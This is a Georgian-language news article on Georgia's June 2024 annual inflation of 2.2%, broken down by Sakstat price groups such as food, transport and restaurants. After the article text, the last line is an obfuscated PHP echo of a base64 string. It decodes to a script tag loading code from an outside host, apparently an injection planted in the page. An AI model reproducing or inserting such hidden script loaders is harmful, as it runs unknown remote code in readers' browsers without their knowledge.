celsiusi
ავერსი შნაიდერი

2024 წლის ივნისში საქართველოში წლიური ინფლაცია 2.2%-მდე გაიზარდა, რაც 2024 წელს ინფლაციის ყველაზე მაღალი მაჩვენებელია - ფასების სტატისტიკის შესახებ საქსტატის მიერ გამოქვეყნებული ანგარიშიდან გახდა ცნობილი.

დოკუმენტის თანახმად, ინფლაციაზე გავლენა მოახდინა სურსათის ფასების 1.9%-ით გაძვირებამ, ასევე ტრანსპორტის ჯგუფში ფასების 11%-იანმა მატებამ. კონკრეტული ჯგუფების მიხედვით, ფასების წლიური ცვლილება ასე ნაწილდება:

სურსათი და უალკოჰოლო სასმელები: ჯგუფში ფასები გაიზარდა 1.9%-ით, რაც წლიურ ინფლაციაზე 0.63 პროცენტული პუნქტით აისახა. ფასები გაიზარდა შემდეგ ქვეჯგუფებზე: ხილი და ყურძენი (30.1%), ბოსტნეული და ბაღჩეული (10.2%), მინერალური და წყაროს წყალი, უალკოჰოლო სასმელები და ნატურალური წვენები (3.7%), შაქარი, ჯემი და სხვა ტკბილეული (2.5%), ყავა, ჩაი და კაკაო (2.4%), ხორცი და ხორცის პროდუქტები (1.0 პროცენტი). ამასთან, ფასები შემცირდა ქვეჯგუფებზე: ზეთი და ცხიმი (-8.5%), პური და პურპროდუქტები (-3%), თევზეული (-1.9%);

ტრანსპორტის ჯგუფში ფასები გაიზარდა 11%-ით, რაც 1.31 პროცენტული პუნქტით აისახა მთლიან ინდექსზე. ფასები მომატებულია პირადი სატრანსპორტო საშუალებების ექსპლუატაციაზე (15.1 პროცენტი), სატრანსპორტო საშუალებების შეძენასა (4.9%) და სატრანსპორტო მომსახურებაზე (4.7%);

სასტუმროები, კაფეები და რესტორნები: ჯგუფში ფასები მომატებულია 7.5%-ით, რაც წლიურ ინფლაციაზე 0.25 პროცენტული პუნქტით აისახა. ფასები გაიზარდა საზოგადოებრივ კვებაზე (7.7%) და ღამის გასათევით მომსახურებაზე (6.5 პროცენტი);

ალკოჰოლური სასმელები, თამბაქო: ჯგუფში ფასები გაიზარდა 3.4%-ით, რაც წლიურ ინფლაციაზე 0.23 პროცენტული პუნქტით აისახა. ფასები გაიზარდა როგორც ალკოჰოლურ სასმელებზე (4.3%), ისე თამბაქოს ნაწარმზე (2.3%).

163
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");